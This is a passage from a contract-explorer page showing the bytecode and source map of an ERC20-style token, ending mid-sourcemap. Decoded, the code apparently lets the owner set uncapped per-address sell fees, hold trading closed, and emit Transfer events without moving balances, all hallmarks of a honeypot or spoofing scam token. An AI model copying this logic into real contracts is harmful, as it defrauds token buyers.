063715018a61461037957806372108297146103815780638da5cb5b1461039457806395d89b41146103a557600080fd5b80634c255c971461032b57806358a1aaae1461034757806370a082311461035057600080fd5b806327c8f83511610171578063395093511161014b57806339509351146102c65780634022b75e146102d957806347062402146102ec57806349bd5a5e1461031357600080fd5b806327c8f835146102655780632b14ca5614610290578063313ce567146102b757600080fd5b806318160ddd116101ad57806318160ddd1461022257806321326f091461023457806322b28da91461023d57806323b872dd1461025257600080fd5b806306fdde03146101d4578063095ea7b3146101f2578063158ef93e14610215575b600080fd5b6101dc61046c565b6040516101e99190610f67565b60405180910390f35b610205610200366004610fd8565b6104fe565b60405190151581526020016101e9565b6006546102059060ff1681565b6003545b6040519081526020016101e9565b61022660095481565b61025061024b366004611002565b610514565b005b610205610260366004611024565b610552565b600754610278906001600160a01b031681565b6040516001600160a01b0390911681526020016101e9565b6102267f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101e9565b6102056102d4366004610fd8565b6105fc565b6102506102e73660046110ac565b610638565b6102267f000000000000000000000000000000000000000000000000000000000000000081565b6006546102789061010090046001600160a01b031681565b61033461271081565b60405161ffff90911681526020016101e9565b61022660085481565b61022661035e36600461112d565b6001600160a01b031660009081526001602052604090205490565b610250610712565b61025061038f3660046110ac565b610748565b6000546001600160a01b0316610278565b6101dc61081a565b6102056103bb366004610fd8565b610829565b6102056103ce366004610fd8565b6108c2565b6102506103e1366004610fd8565b6108cf565b6102267f000000000000000000000000000000000000000000000000000000000000000081565b61025061041b36600461112d565b610915565b61022661042e36600461114f565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61025061046736600461112d565b610967565b60606004805461047b90611182565b80601f01602080910402602001604051908101604052809291908181526020018280546104a790611182565b80156104f45780601f106104c9576101008083540402835291602001916104f4565b820191906000526020600020905b8154815290600101906020018083116104d757829003601f168201915b5050505050905090565b600061050b338484610a02565b50600192915050565b6000546001600160a01b031633146105475760405162461bcd60e51b815260040161053e906111bc565b60405180910390fd5b600891909155600955565b600061055f848484610b26565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156105e45760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161053e565b6105f18533858403610a02565b506001949350505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161050b918590610633908690611207565b610a02565b6000546001600160a01b031633146106625760405162461bcd60e51b815260040161053e906111bc565b60005b8381101561070a5784848281811061067f5761067f61121f565b9050602002016020810190610694919061112d565b6001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106106da576106da61121f565b905060200201356040516106f091815260200190565b60405180910390a38061070281611235565b915050610665565b505050505050565b6000546001600160a01b0316331461073c5760405162461bcd60e51b815260040161053e906111bc565b6107466000610d49565b565b6000546001600160a01b031633146107725760405162461bcd60e51b815260040161053e906111bc565b60005b8381101561070a5784848281811061078f5761078f61121f565b90506020020160208101906107a4919061112d565b6001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106107ea576107ea61121f565b9050602002013560405161080091815260200190565b60405180910390a38061081281611235565b915050610775565b60606005805461047b90611182565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156108ab5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161053e565b6108b83385858403610a02565b5060019392505050565b600061050b338484610b26565b6000546001600160a01b031633146108f95760405162461bcd60e51b815260040161053e906111bc565b6001600160a01b039091166000908152600a6020526040902055565b6000546001600160a01b0316331461093f5760405162461bcd60e51b815260040161053e906111bc565b600680546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6000546001600160a01b031633146109915760405162461bcd60e51b815260040161053e906111bc565b6001600160a01b0381166109f65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161053e565b6109ff81610d49565b50565b6001600160a01b038316610a645760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161053e565b6001600160a01b038216610ac55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161053e565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60065460ff161515600114610b7d5760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a207472616465206973206e6f74206f70656e2100000000604482015260640161053e565b60065461010090046001600160a01b0316158015610ba2575060065460ff1615156001145b15610c1c576000546001600160a01b0384811691161480610bd057506000546001600160a01b038381169116145b610c1c5760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f742073746172746564604482015260640161053e565b600654819061010090046001600160a01b031615801590610c4b57506000546001600160a01b03858116911614155b8015610c6557506000546001600160a01b03848116911614155b15610d38576006546000906001600160a01b03610100909104811690861603610c915750600854610cee565b6006546001600160a01b03610100909104811690851603610cee576001600160a01b0385166000908152600a602052604090205415610ce957506001600160a01b0384166000908152600a6020526040902054610cee565b506009545b8015610d36576000612710610d03838661124e565b610d0d919061126d565b9050610d19818561128f565b600754909350610d349087906001600160a01b031683610d99565b505b505b610d43848483610d99565b50505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610dfd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161053e565b6001600160a01b038216610e5f5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161053e565b6001600160a01b03831660009081526001602052604090205481811015610ed75760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161053e565b6001600160a01b03808516600090815260016020526040808220858503905591851681529081208054849290610f0e908490611207565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f5a91815260200190565b60405180910390a3610d43565b600060208083528351808285015260005b81811015610f9457858101830151858201604001528201610f78565b81811115610fa6576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610fd357600080fd5b919050565b60008060408385031215610feb57600080fd5b610ff483610fbc565b946020939093013593505050565b6000806040838503121561101557600080fd5b50508035926020909101359150565b60008060006060848603121561103957600080fd5b61104284610fbc565b925061105060208501610fbc565b9150604084013590509250925092565b60008083601f84011261107257600080fd5b50813567ffffffffffffffff81111561108a57600080fd5b6020830191508360208260051b85010111156110a557600080fd5b9250929050565b6000806000806000606086880312156110c457600080fd5b6110cd86610fbc565b9450602086013567ffffffffffffffff808211156110ea57600080fd5b6110f689838a01611060565b9096509450604088013591508082111561110f57600080fd5b5061111c88828901611060565b969995985093965092949392505050565b60006020828403121561113f57600080fd5b61114882610fbc565b9392505050565b6000806040838503121561116257600080fd5b61116b83610fbc565b915061117960208401610fbc565b90509250929050565b600181811c9082168061119657607f821691505b6020821081036111b657634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b6000821982111561121a5761121a6111f1565b500190565b634e487b7160e01b600052603260045260246000fd5b600060018201611247576112476111f1565b5060010190565b6000816000190483118215151615611268576112686111f1565b500290565b60008261128a57634e487b7160e01b600052601260045260246000fd5b500490565b6000828210156112a1576112a16111f1565b50039056fea26469706673582212205930b4b586075dad3f0b685d19bec621d658b77fee93c16ba099c40a0397533464736f6c634300080d0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101cf5760003560e01c80634c255c9711610104578063985bdfd1116100a2578063d5abeb0111610071578063d5abeb01146103e6578063d5aed6bf1461040d578063dd62ed3e14610420578063f2fde38b1461045957600080fd5b8063985bdfd11461032b578063a457c2d7146103ad578063a9059cbb146103c0578063c4e7c165146103d357600080fd5b8063715018a6116100de578063715018a61461037957806372108297146103815780638da5cb5b1461039457806395d89b41146103a557600080fd5b80634c255c971461032b57806358a1aaae1461034757806370a082311461035057600080fd5b806327c8f83511610171578063395093511161014b57806339509351146102c65780634022b75e146102d957806347062402146102ec57806349bd5a5e1461031357600080fd5b806327c8f835146102655780632b14ca5614610290578063313ce567146102b757600080fd5b806318160ddd116101ad57806318160ddd1461022257806321326f091461023457806322b28da91461023d57806323b872dd1461025257600080fd5b806306fdde03146101d4578063095ea7b3146101f2578063158ef93e14610215575b600080fd5b6101dc61046c565b6040516101e99190610f67565b60405180910390f35b610205610200366004610fd8565b6104fe565b60405190151581526020016101e9565b6006546102059060ff1681565b6003545b6040519081526020016101e9565b61022660095481565b61025061024b366004611002565b610514565b005b610205610260366004611024565b610552565b600754610278906001600160a01b031681565b6040516001600160a01b0390911681526020016101e9565b6102267f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101e9565b6102056102d4366004610fd8565b6105fc565b6102506102e73660046110ac565b610638565b6102267f000000000000000000000000000000000000000000000000000000000000000081565b6006546102789061010090046001600160a01b031681565b61033461271081565b60405161ffff90911681526020016101e9565b61022660085481565b61022661035e36600461112d565b6001600160a01b031660009081526001602052604090205490565b610250610712565b61025061038f3660046110ac565b610748565b6000546001600160a01b0316610278565b6101dc61081a565b6102056103bb366004610fd8565b610829565b6102056103ce366004610fd8565b6108c2565b6102506103e1366004610fd8565b6108cf565b6102267f00000000000000000000000000000000000014bddab3e51a57cff87a5000000081565b61025061041b36600461112d565b610915565b61022661042e36600461114f565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b61025061046736600461112d565b610967565b60606004805461047b90611182565b80601f01602080910402602001604051908101604052809291908181526020018280546104a790611182565b80156104f45780601f106104c9576101008083540402835291602001916104f4565b820191906000526020600020905b8154815290600101906020018083116104d757829003601f168201915b5050505050905090565b600061050b338484610a02565b50600192915050565b6000546001600160a01b031633146105475760405162461bcd60e51b815260040161053e906111bc565b60405180910390fd5b600891909155600955565b600061055f848484610b26565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156105e45760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161053e565b6105f18533858403610a02565b506001949350505050565b3360008181526002602090815260408083206001600160a01b0387168452909152812054909161050b918590610633908690611207565b610a02565b6000546001600160a01b031633146106625760405162461bcd60e51b815260040161053e906111bc565b60005b8381101561070a5784848281811061067f5761067f61121f565b9050602002016020810190610694919061112d565b6001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106106da576106da61121f565b905060200201356040516106f091815260200190565b60405180910390a38061070281611235565b915050610665565b505050505050565b6000546001600160a01b0316331461073c5760405162461bcd60e51b815260040161053e906111bc565b6107466000610d49565b565b6000546001600160a01b031633146107725760405162461bcd60e51b815260040161053e906111bc565b60005b8381101561070a5784848281811061078f5761078f61121f565b90506020020160208101906107a4919061112d565b6001600160a01b0316866001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106107ea576107ea61121f565b9050602002013560405161080091815260200190565b60405180910390a38061081281611235565b915050610775565b60606005805461047b90611182565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156108ab5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161053e565b6108b83385858403610a02565b5060019392505050565b600061050b338484610b26565b6000546001600160a01b031633146108f95760405162461bcd60e51b815260040161053e906111bc565b6001600160a01b039091166000908152600a6020526040902055565b6000546001600160a01b0316331461093f5760405162461bcd60e51b815260040161053e906111bc565b600680546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b6000546001600160a01b031633146109915760405162461bcd60e51b815260040161053e906111bc565b6001600160a01b0381166109f65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161053e565b6109ff81610d49565b50565b6001600160a01b038316610a645760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161053e565b6001600160a01b038216610ac55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161053e565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60065460ff161515600114610b7d5760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a207472616465206973206e6f74206f70656e2100000000604482015260640161053e565b60065461010090046001600160a01b0316158015610ba2575060065460ff1615156001145b15610c1c576000546001600160a01b0384811691161480610bd057506000546001600160a01b038381169116145b610c1c5760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f742073746172746564604482015260640161053e565b600654819061010090046001600160a01b031615801590610c4b57506000546001600160a01b03858116911614155b8015610c6557506000546001600160a01b03848116911614155b15610d38576006546000906001600160a01b03610100909104811690861603610c915750600854610cee565b6006546001600160a01b03610100909104811690851603610cee576001600160a01b0385166000908152600a602052604090205415610ce957506001600160a01b0384166000908152600a6020526040902054610cee565b506009545b8015610d36576000612710610d03838661124e565b610d0d919061126d565b9050610d19818561128f565b600754909350610d349087906001600160a01b031683610d99565b505b505b610d43848483610d99565b50505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610dfd5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161053e565b6001600160a01b038216610e5f5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161053e565b6001600160a01b03831660009081526001602052604090205481811015610ed75760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161053e565b6001600160a01b03808516600090815260016020526040808220858503905591851681529081208054849290610f0e908490611207565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f5a91815260200190565b60405180910390a3610d43565b600060208083528351808285015260005b81811015610f9457858101830151858201604001528201610f78565b81811115610fa6576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610fd357600080fd5b919050565b60008060408385031215610feb57600080fd5b610ff483610fbc565b946020939093013593505050565b6000806040838503121561101557600080fd5b50508035926020909101359150565b60008060006060848603121561103957600080fd5b61104284610fbc565b925061105060208501610fbc565b9150604084013590509250925092565b60008083601f84011261107257600080fd5b50813567ffffffffffffffff81111561108a57600080fd5b6020830191508360208260051b85010111156110a557600080fd5b9250929050565b6000806000806000606086880312156110c457600080fd5b6110cd86610fbc565b9450602086013567ffffffffffffffff808211156110ea57600080fd5b6110f689838a01611060565b9096509450604088013591508082111561110f57600080fd5b5061111c88828901611060565b969995985093965092949392505050565b60006020828403121561113f57600080fd5b61114882610fbc565b9392505050565b6000806040838503121561116257600080fd5b61116b83610fbc565b915061117960208401610fbc565b90509250929050565b600181811c9082168061119657607f821691505b6020821081036111b657634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b6000821982111561121a5761121a6111f1565b500190565b634e487b7160e01b600052603260045260246000fd5b600060018201611247576112476111f1565b5060010190565b6000816000190483118215151615611268576112686111f1565b500290565b60008261128a57634e487b7160e01b600052601260045260246000fd5b500490565b6000828210156112a1576112a16111f1565b50039056fea26469706673582212205930b4b586075dad3f0b685d19bec621d658b77fee93c16ba099c40a0397533464736f6c634300080d0033

Deployed Bytecode Sourcemap

20617:3793:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9643:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11876:194;;;;;;:::i;:::-;;:::i;:::-;;;1218:14:1;;1211:22;1193:41;;1181:2;1166:18;11876:194:0;1053:187:1;20855:31:0;;;;;;;;;10763:108;10851:12;;10763:108;;;1391:25:1;;;1379:2;1364:18;10763:108:0;1245:177:1;21144:31:0;;;;;;22164:168;;;;;;:::i;:::-;;:::i;:::-;;12552:529;;;;;;:::i;:::-;;:::i;20941:71::-;;;;;-1:-1:-1;;;;;20941:71:0;;;;;;-1:-1:-1;;;;;2177:32:1;;;2159:51;;2147:2;2132:18;20941:71:0;2013:203:1;21063:36:0;;;;;10605:93;;;10688:2;2363:36:1;;2351:2;2336:18;10605:93:0;2221:184:1;13490:290:0;;;;;;:::i;:::-;;:::i;22856:254::-;;;;;;:::i;:::-;;:::i;21021:35::-;;;;;20893:41;;;;;;;;-1:-1:-1;;;;;20893:41:0;;;20801:45;;20841:5;20801:45;;;;;3808:6:1;3796:19;;;3778:38;;3766:2;3751:18;20801:45:0;3634:188:1;21106:31:0;;;;;;10934:143;;;;;;:::i;:::-;-1:-1:-1;;;;;11051:18:0;11024:7;11051:18;;;:9;:18;;;;;;;10934:143;2939:103;;;:::i;22598:250::-;;;;;;:::i;:::-;;:::i;2252:87::-;2298:7;2325:6;-1:-1:-1;;;;;2325:6:0;2252:87;;9862:104;;;:::i;14283:475::-;;;;;;:::i;:::-;;:::i;11290:200::-;;;;;;:::i;:::-;;:::i;22464:126::-;;;;;;:::i;:::-;;:::i;20661:77::-;;;;;22340:116;;;;;;:::i;:::-;;:::i;11553:176::-;;;;;;:::i;:::-;-1:-1:-1;;;;;11694:18:0;;;11667:7;11694:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11553:176;3197:238;;;;;;:::i;:::-;;:::i;9643:100::-;9697:13;9730:5;9723:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9643:100;:::o;11876:194::-;11984:4;12001:39;1029:10;12024:7;12033:6;12001:8;:39::i;:::-;-1:-1:-1;12058:4:0;11876:194;;;;:::o;22164:168::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;;;;;;;;;22257:12:::1;:28:::0;;;;22296:12:::1;:28:::0;22164:168::o;12552:529::-;12692:4;12709:36;12719:6;12727:9;12738:6;12709:9;:36::i;:::-;-1:-1:-1;;;;;12785:19:0;;12758:24;12785:19;;;:11;:19;;;;;;;;1029:10;12785:33;;;;;;;;12851:26;;;;12829:116;;;;-1:-1:-1;;;12829:116:0;;5231:2:1;12829:116:0;;;5213:21:1;5270:2;5250:18;;;5243:30;5309:34;5289:18;;;5282:62;-1:-1:-1;;;5360:18:1;;;5353:38;5408:19;;12829:116:0;5029:404:1;12829:116:0;12981:57;12990:6;1029:10;13031:6;13012:16;:25;12981:8;:57::i;:::-;-1:-1:-1;13069:4:0;;12552:529;-1:-1:-1;;;;12552:529:0:o;13490:290::-;1029:10;13603:4;13692:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13692:34:0;;;;;;;;;;13603:4;;13620:130;;13670:7;;13692:47;;13729:10;;13692:47;:::i;:::-;13620:8;:130::i;22856:254::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;22988:9:::1;22983:120;23003:19:::0;;::::1;22983:120;;;23067:8;;23076:1;23067:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;23049:42:0::1;23058:7;-1:-1:-1::0;;;;;23049:42:0::1;;23080:7;;23088:1;23080:10;;;;;;;:::i;:::-;;;;;;;23049:42;;;;1391:25:1::0;;1379:2;1364:18;;1245:177;23049:42:0::1;;;;;;;;23024:3:::0;::::1;::::0;::::1;:::i;:::-;;;;22983:120;;;;22856:254:::0;;;;;:::o;2939:103::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;3004:30:::1;3031:1;3004:18;:30::i;:::-;2939:103::o:0;22598:250::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;22726:9:::1;22721:120;22741:19:::0;;::::1;22721:120;;;22805:8;;22814:1;22805:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;:::i;:::-;-1:-1:-1::0;;;;;22787:42:0::1;22796:7;-1:-1:-1::0;;;;;22787:42:0::1;;22818:7;;22826:1;22818:10;;;;;;;:::i;:::-;;;;;;;22787:42;;;;1391:25:1::0;;1379:2;1364:18;;1245:177;22787:42:0::1;;;;;;;;22762:3:::0;::::1;::::0;::::1;:::i;:::-;;;;22721:120;;9862:104:::0;9918:13;9951:7;9944:14;;;;;:::i;14283:475::-;1029:10;14401:4;14445:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14445:34:0;;;;;;;;;;14512:35;;;;14490:122;;;;-1:-1:-1;;;14490:122:0;;6177:2:1;14490:122:0;;;6159:21:1;6216:2;6196:18;;;6189:30;6255:34;6235:18;;;6228:62;-1:-1:-1;;;6306:18:1;;;6299:35;6351:19;;14490:122:0;5975:401:1;14490:122:0;14648:67;1029:10;14671:7;14699:15;14680:16;:34;14648:8;:67::i;:::-;-1:-1:-1;14746:4:0;;14283:475;-1:-1:-1;;;14283:475:0:o;11290:200::-;11401:4;11418:42;1029:10;11442:9;11453:6;11418:9;:42::i;22464:126::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;22546:26:0;;::::1;;::::0;;;:16:::1;:26;::::0;;;;:36;22464:126::o;22340:116::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;22418:13:::1;:30:::0;;-1:-1:-1;;;;;22418:30:0;;::::1;;;-1:-1:-1::0;;;;;;22418:30:0;;::::1;::::0;;;::::1;::::0;;22340:116::o;3197:238::-;2486:6;;-1:-1:-1;;;;;2486:6:0;1029:10;2486:22;2464:104;;;;-1:-1:-1;;;2464:104:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;3300:22:0;::::1;3278:110;;;::::0;-1:-1:-1;;;3278:110:0;;6583:2:1;3278:110:0::1;::::0;::::1;6565:21:1::0;6622:2;6602:18;;;6595:30;6661:34;6641:18;;;6634:62;-1:-1:-1;;;6712:18:1;;;6705:36;6758:19;;3278:110:0::1;6381:402:1::0;3278:110:0::1;3399:28;3418:8;3399:18;:28::i;:::-;3197:238:::0;:::o;18066:380::-;-1:-1:-1;;;;;18202:19:0;;18194:68;;;;-1:-1:-1;;;18194:68:0;;6990:2:1;18194:68:0;;;6972:21:1;7029:2;7009:18;;;7002:30;7068:34;7048:18;;;7041:62;-1:-1:-1;;;7119:18:1;;;7112:34;7163:19;;18194:68:0;6788:400:1;18194:68:0;-1:-1:-1;;;;;18281:21:0;;18273:68;;;;-1:-1:-1;;;18273:68:0;;7395:2:1;18273:68:0;;;7377:21:1;7434:2;7414:18;;;7407:30;7473:34;7453:18;;;7446:62;-1:-1:-1;;;7524:18:1;;;7517:32;7566:19;;18273:68:0;7193:398:1;18273:68:0;-1:-1:-1;;;;;18354:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18406:32;;1391:25:1;;;18406:32:0;;1364:18:1;18406:32:0;;;;;;;18066:380;;;:::o;23118:1289::-;23271:11;;;;:19;;:11;:19;23249:97;;;;-1:-1:-1;;;23249:97:0;;7798:2:1;23249:97:0;;;7780:21:1;7837:2;7817:18;;;7810:30;7876;7856:18;;;7849:58;7924:18;;23249:97:0;7596:352:1;23249:97:0;23363:13;;;;;-1:-1:-1;;;;;23363:13:0;:27;:50;;;;-1:-1:-1;23394:11:0;;;;:19;;:11;:19;23363:50;23359:209;;;2298:7;2325:6;-1:-1:-1;;;;;23456:15:0;;;2325:6;;23456:15;;:32;;-1:-1:-1;2298:7:0;2325:6;-1:-1:-1;;;;;23475:13:0;;;2325:6;;23475:13;23456:32;23430:126;;;;-1:-1:-1;;;23430:126:0;;8155:2:1;23430:126:0;;;8137:21:1;;;8174:18;;;8167:30;8233:34;8213:18;;;8206:62;8285:18;;23430:126:0;7953:356:1;23430:126:0;23627:13;;23606:6;;23627:13;;;-1:-1:-1;;;;;23627:13:0;:27;;;;:46;;-1:-1:-1;2298:7:0;2325:6;-1:-1:-1;;;;;23658:15:0;;;2325:6;;23658:15;;23627:46;:63;;;;-1:-1:-1;2298:7:0;2325:6;-1:-1:-1;;;;;23677:13:0;;;2325:6;;23677:13;;23627:63;23623:722;;;23750:13;;23707:12;;-1:-1:-1;;;;;23750:13:0;;;;;;23742:21;;;;23738:349;;-1:-1:-1;23791:12:0;;23738:349;;;23848:13;;-1:-1:-1;;;;;23848:13:0;;;;;;23842:19;;;;23838:249;;-1:-1:-1;;;;;23886:22:0;;;;;;:16;:22;;;;;;:27;23882:190;;-1:-1:-1;;;;;;23945:22:0;;;;;;:16;:22;;;;;;23882:190;;;-1:-1:-1;24040:12:0;;23882:190;24105:8;;24101:233;;24134:22;20841:5;24159:13;24168:4;24159:6;:13;:::i;:::-;:30;;;;:::i;:::-;24134:55;-1:-1:-1;24226:23:0;24134:55;24226:6;:23;:::i;:::-;24290:11;;24208:41;;-1:-1:-1;24268:50:0;;24284:4;;-1:-1:-1;;;;;24290:11:0;24303:14;24268:15;:50::i;:::-;24115:219;24101:233;23692:653;23623:722;24357:42;24373:4;24379:2;24383:15;24357;:42::i;:::-;23238:1169;23118:1289;;;:::o;3595:191::-;3669:16;3688:6;;-1:-1:-1;;;;;3705:17:0;;;-1:-1:-1;;;;;;3705:17:0;;;;;;3738:40;;3688:6;;;;;;;3738:40;;3669:16;3738:40;3658:128;3595:191;:::o;15248:770::-;-1:-1:-1;;;;;15388:20:0;;15380:70;;;;-1:-1:-1;;;15380:70:0;;9041:2:1;15380:70:0;;;9023:21:1;9080:2;9060:18;;;9053:30;9119:34;9099:18;;;9092:62;-1:-1:-1;;;9170:18:1;;;9163:35;9215:19;;15380:70:0;8839:401:1;15380:70:0;-1:-1:-1;;;;;15469:23:0;;15461:71;;;;-1:-1:-1;;;15461:71:0;;9447:2:1;15461:71:0;;;9429:21:1;9486:2;9466:18;;;9459:30;9525:34;9505:18;;;9498:62;-1:-1:-1;;;9576:18:1;;;9569:33;9619:19;;15461:71:0;9245:399:1;15461:71:0;-1:-1:-1;;;;;15629:17:0;;15605:21;15629:17;;;:9;:17;;;;;;15679:23;;;;15657:111;;;;-1:-1:-1;;;15657:111:0;;9851:2:1;15657:111:0;;;9833:21:1;9890:2;9870:18;;;9863:30;9929:34;9909:18;;;9902:62;-1:-1:-1;;;9980:18:1;;;9973:36;10026:19;;15657:111:0;9649:402:1;15657:111:0;-1:-1:-1;;;;;15804:17:0;;;;;;;:9;:17;;;;;;15824:22;;;15804:42;;15868:20;;;;;;;;:30;;15840:6;;15804:17;15868:30;;15840:6;;15868:30;:::i;:::-;;;;;;;;15933:9;-1:-1:-1;;;;;15916:35:0;15925:6;-1:-1:-1;;;;;15916:35:0;;15944:6;15916:35;;;;1391:25:1;;1379:2;1364:18;;1245:177;15916:35:0;;;;;;;;15964:46;19046:125;14:597:1;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;452:6;449:1;446:13;443:91;;;522:1;517:2;508:6;497:9;493:22;489:31;482:42;443:91;-1:-1:-1;595:2:1;574:15;-1:-1:-1;;570:29:1;555:45;;;;602:2;551:54;;14:597;-1:-1:-1;;;14:597:1:o;616:173::-;684:20;;-1:-1:-1;;;;;733:31:1;;723:42;;713:70;;779:1;776;769:12;713:70;616:173;;;:::o;794:254::-;862:6;870;923:2;911:9;902:7;898:23;894:32;891:52;;;939:1;936;929:12;891:52;962:29;981:9;962:29;:::i;:::-;952:39;1038:2;1023:18;;;;1010:32;;-1:-1:-1;;;794:254:1:o;1427:248::-;1495:6;1503;1556:2;1544:9;1535:7;1531:23;1527:32;1524:52;;;1572:1;1569;1562:12;1524:52;-1:-1:-1;;1595:23:1;;;1665:2;1650:18;;;1637:32;;-1:-1: